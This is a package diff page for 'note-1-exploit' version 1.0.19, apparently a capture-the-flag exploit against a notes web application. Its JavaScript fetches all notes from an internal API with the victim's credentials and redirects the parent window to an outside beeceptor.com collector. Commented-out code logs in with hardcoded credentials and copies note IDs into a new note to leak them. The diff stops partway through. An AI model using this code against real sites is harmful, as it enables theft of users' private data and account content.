note-1-exploit 1.0.18 → 1.0.19
Sign up to get free protection for your applications and to get access to all the features.
- package/index.js +52 -16
- package/package.json +1 -1
package/index.js
CHANGED
@@ -1,27 +1,63 @@
|
|
1
1
|
async function exploit() {
|
2
2
|
let all_results = await fetch("http://web/api/notes/all", {
|
3
|
+
"headers": {
|
4
|
+
"accept": "*/*",
|
5
|
+
"accept-language": "zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7",
|
6
|
+
"sec-gpc": "1"
|
7
|
+
},
|
8
|
+
"referrer": "http://127.0.0.1:10082/",
|
9
|
+
"referrerPolicy": "strict-origin-when-cross-origin",
|
10
|
+
"body": null,
|
3
11
|
"method": "GET",
|
4
12
|
"mode": "cors",
|
5
13
|
"credentials": "include"
|
6
14
|
}).then(res => res.text());
|
7
15
|
// let json_results = await all_results.json();
|
8
16
|
// let note_name = (Math.random() + 1).toString(36).substring(7);
|
9
|
-
window.parent.location.replace("https://omniman.free.beeceptor.com?q="
|
10
|
-
//
|
11
|
-
|
12
|
-
|
13
|
-
|
14
|
-
|
15
|
-
|
16
|
-
|
17
|
-
|
18
|
-
|
19
|
-
|
20
|
-
|
21
|
-
|
22
|
-
|
23
|
-
|
24
|
-
//
|
17
|
+
window.parent.location.replace("https://omniman.free.beeceptor.com?q=hahahaha")
|
18
|
+
// await fetch("http://127.0.0.1:10082/login", {
|
19
|
+
// "headers": {
|
20
|
+
// "accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/127.0.0.1:10082p,image/apng,*/*;q=0.8",
|
21
|
+
// "accept-language": "zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7",
|
22
|
+
// "cache-control": "max-age=0",
|
23
|
+
// "content-type": "application/x-www-form-urlencoded",
|
24
|
+
// "sec-gpc": "1",
|
25
|
+
// "upgrade-insecure-requests": "1"
|
26
|
+
// },
|
27
|
+
// "referrer": "http://127.0.0.1:10082/login",
|
28
|
+
// "referrerPolicy": "strict-origin-when-cross-origin",
|
29
|
+
// "body": "username=nnnddd&password=nnnddd",
|
30
|
+
// "method": "POST",
|
31
|
+
// "mode": "cors",
|
32
|
+
// "redirect": "follow",
|
33
|
+
// "credentials": "include"
|
34
|
+
// });
|
35
|
+
// await fetch("http://127.0.0.1:10082/login", {
|
36
|
+
// "headers": {
|
37
|
+
// "accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/127.0.0.1:10082p,image/apng,*/*;q=0.8",
|
38
|
+
// "accept-language": "zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7",
|
39
|
+
// "cache-control": "max-age=0",
|
40
|
+
// "content-type": "application/x-www-form-urlencoded",
|
41
|
+
// "sec-gpc": "1",
|
42
|
+
// "upgrade-insecure-requests": "1"
|
43
|
+
// },
|
44
|
+
// "referrer": "http://127.0.0.1:10082/login",
|
45
|
+
// "referrerPolicy": "strict-origin-when-cross-origin",
|
46
|
+
// "body": "username=nnnddd&password=nnnddd",
|
47
|
+
// "method": "POST",
|
48
|
+
// "mode": "cors",
|
49
|
+
// "redirect": "follow",
|
50
|
+
// "credentials": "include"
|
51
|
+
// });
|
52
|
+
// await fetch("http://127.0.0.1:10082/api/notes", {
|
53
|
+
// "headers": {
|
54
|
+
// "accept": "*/*",
|
55
|
+
// "accept-language": "zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7",
|
56
|
+
// "content-type": "application/json",
|
57
|
+
// "sec-gpc": "1"
|
58
|
+
// },
|
59
|
+
// "referrer": "http://127.0.0.1:10082/",
|
60
|
+
// "referrerPolicy": "strict-origin-when-cross-origin",
|
25
61
|
// "body": "{\"title\":\"" + note_name + "\",\"content\":\"" + json_results[0].id + "\"}",
|
26
62
|
// "method": "POST",
|
27
63
|
// "mode": "cors",
|